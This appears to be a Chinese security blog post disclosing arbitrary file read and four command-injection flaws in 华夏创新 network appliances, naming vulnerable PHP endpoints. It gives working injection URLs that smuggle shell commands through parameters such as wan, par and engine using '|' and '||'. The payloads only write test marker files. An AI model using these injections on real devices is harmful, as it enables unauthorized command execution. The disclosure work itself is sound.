华夏创新四种设备存在命令执行以及文件遍历

1.任意文件读取

/tmp/appexcfg/www/acc/vpn/download.php


 

没有对这个过程做任何处理。直接遍历任意文件。利用文件遍历可以做一些其他的事情

2136738738[1]

2.命令执行一

/tmp/appexcfg/www/acc/network/redial_pppoe.php


 

在common/appexConfigInterface.inc中查看下ifDownInterface与ifUpInterface的方法


 

然后查看前面的private $ifDownCmdFormat = “/sbin/ifdown %s > /dev/null”;

那么执行的方式就出来了。使用||来联合执行。wan=a|echo%20test>testvul.txt||

测试url: http://192.168.1.1/acc/network/redial_pppoe.php?wan=a|echo%20test>testvul.txt||

2050513790[1]

1395869217[1]

命令执行2

/tmp/appexcfg/www/acc/tools/enable_tool_debug.php


 

在common/commandWrapper.inc中查看下runTool


 

 

 

因此必须是enable_tool_debug.php?val=0的前提下才可以执行命令tool=1&par=-c 127.0.0.1 || echo test >test1.txt ||a

直接请求/acc/tools/enable_tool_debug.php?val=0&tool=1&par=-c%201%20localhost%20|%20echo%20testvul1%20>%20testvul.txt%20||%20a

查看testvul.txt内容有testvule即可

2479593397[1]

 

命令执行3

/tmp/appexcfg/www/acc/debug/bytecache_run_action.php


 

从common/commandWrapper.inc里面看看startByteCacheDebug


 

直接贴上利用/acc/debug/bytecache_run_action.php?action=1&engine=test’|echo testvul>bug.txt||’a

命令执行4

/tmp/appexcfg/www/acc/bindipmac/static_arp_list_action.php


 

根据对应的名字,在/acc/common/config/dao/arpDao.inc里面查看到了addARPConfig


 

在后面看到了addARPToSystem与delARPToSystem相关的定义


 

依旧贴上利用:

 

依旧匹配testvul。附上测试脚本


 

695979147[1]

发表评论

要发表评论,您必须先登录